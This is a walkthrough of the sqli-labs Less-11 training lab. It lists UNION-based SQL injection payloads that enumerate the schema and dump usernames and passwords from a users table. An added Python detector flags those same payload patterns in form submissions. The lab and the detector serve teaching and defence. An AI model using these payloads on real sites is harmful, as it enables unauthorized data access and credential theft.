[Network Security] sqli-labs Less-11: Detailed Walkthrough
The approach and syntax are relatively simple, so they are not covered in detail.
Determine the type of injection
Comparing the responses echoed in the two figures (above and below) shows that the injection type is character (string) injection.
Determine the number of injection points
The two figures (above and below) show that the number of injection points is 2.
Query the database name
1' union select 1,database()#
The database name is security.
Query the table names
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#
The response echoes four table names.
Query the column names
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')#
Query the data
1' union select group_concat(username),group_concat(password) from security.users#
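As an added example (not part of the original post), the following Python sketch is a defender-side check that flags the payload shapes used above when they appear in form-encoded POST bodies. The field names uname and passwd, the sample requests, and the strong/weak rule split are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

# Patterns keyed to the payload shapes in this walkthrough. Weak rules are
# common in honest input (a password may end in '#'), so they never alert alone.
STRONG = {
    "union_after_quote": re.compile(r"'\s*union\s+(?:all\s+)?select\b", re.I),
    "schema_enumeration": re.compile(
        r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I),
}
WEAK = {
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "database_call": re.compile(r"\bdatabase\s*\(\s*\)", re.I),
    "trailing_hash": re.compile(r"#\s*$"),
}

def inspect_body(body):
    """Map each form field of a urlencoded POST body to the rules it matches."""
    findings = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            hits = [n for n, rx in {**STRONG, **WEAK}.items() if rx.search(value)]
            if hits:
                findings.setdefault(field, []).extend(hits)
    return findings

def should_alert(findings):
    """Alert on any strong rule, or on two or more weak rules in one field."""
    return any(
        any(h in STRONG for h in hits) or len(set(hits)) >= 2
        for hits in findings.values()
    )

# Constructed sample requests; "uname" and "passwd" are assumed field names.
SAMPLES = [
    urlencode({"uname": "admin", "passwd": "Tr0ub4dor#"}),
    urlencode({"uname": "1' union select 1,database()#", "passwd": "x"}),
    urlencode({"uname": "x", "passwd": "1' union select 1,(select group_concat("
               "table_name) from information_schema.tables where "
               "table_schema='security')#"}),
]

if __name__ == "__main__":
    for body in SAMPLES:
        found = inspect_body(body)
        print("ALERT" if should_alert(found) else "ok   ", found)
```

The first sample shows the false-positive case: a legitimate password ending in # matches only a weak rule and does not alert.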
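Summary
The above is the detailed walkthrough of [Network Security] sqli-labs Less-11. A detailed walkthrough of [Network Security] sqli-labs Less-12 will be shared next. Readers are encouraged to work through it hands-on.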
I am Qiu said, see you next time.